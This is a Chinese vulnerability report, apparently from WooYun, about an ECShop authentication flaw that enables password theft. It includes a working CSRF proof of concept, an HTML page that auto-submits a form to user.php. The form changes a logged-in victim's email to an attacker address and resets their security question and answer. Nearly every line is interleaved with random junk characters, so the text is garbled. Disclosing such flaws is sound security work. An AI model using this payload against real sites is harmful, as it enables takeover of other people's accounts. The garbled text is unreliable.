简要描述:5 a- S) S" Q% p) M4 C4 B
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现0 l: f% A& c2 H$ y5 E5 `$ g
4 _! R( Q2 L( s0 t
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
' U0 t2 ?- v- j6 J$ T
( J! y n! z) a6 k1 x: R详细说明:# [; F L3 c' i" B; [- L
利用csrf和xss可以突破官方所说的“障碍”, a+ _) m3 f; h& _4 J: S" i2 L
xss版本已经有人说明
& `+ G- _3 k' r4 i这里给出csrf版本1 w6 V6 K" |2 j/ I# |5 g3 N
/ l& E1 @. M$ V6 ?$ ~7 Z( ~漏洞证明:! N' ~2 p* f; Y$ B% F4 C6 d" V
<html>
! n' C; A! }$ H' k7 d8 r6 Y6 u<body>3 I# {8 q( G5 \: f
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
3 c* ]+ [9 B$ E I/ }<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">, u$ P( S# B- @ ]. h
<INPUT TYPE="text" NAME="act" value="act_edit_profile">/ x7 b6 n, g+ F$ ~! g
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
% G( N/ y3 F) _ ~4 z: a. z<INPUT TYPE="text" NAME="passwd_answer" value="exploit">$ L; X& X# a% D' s/ M6 `' t
</body>( ~5 W4 y T$ q6 f# w# c
<script>- X- X7 p' s8 U1 w4 y
document.forms[0].submit();
: B ^" ]- ^1 x) B' D</script>5 M; j& y: \( T& \
</html>
9 B$ O; b2 m! Q$ p# q构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
% Y Z; y( J2 l4 |% \
2 x4 M0 G6 P* X" W |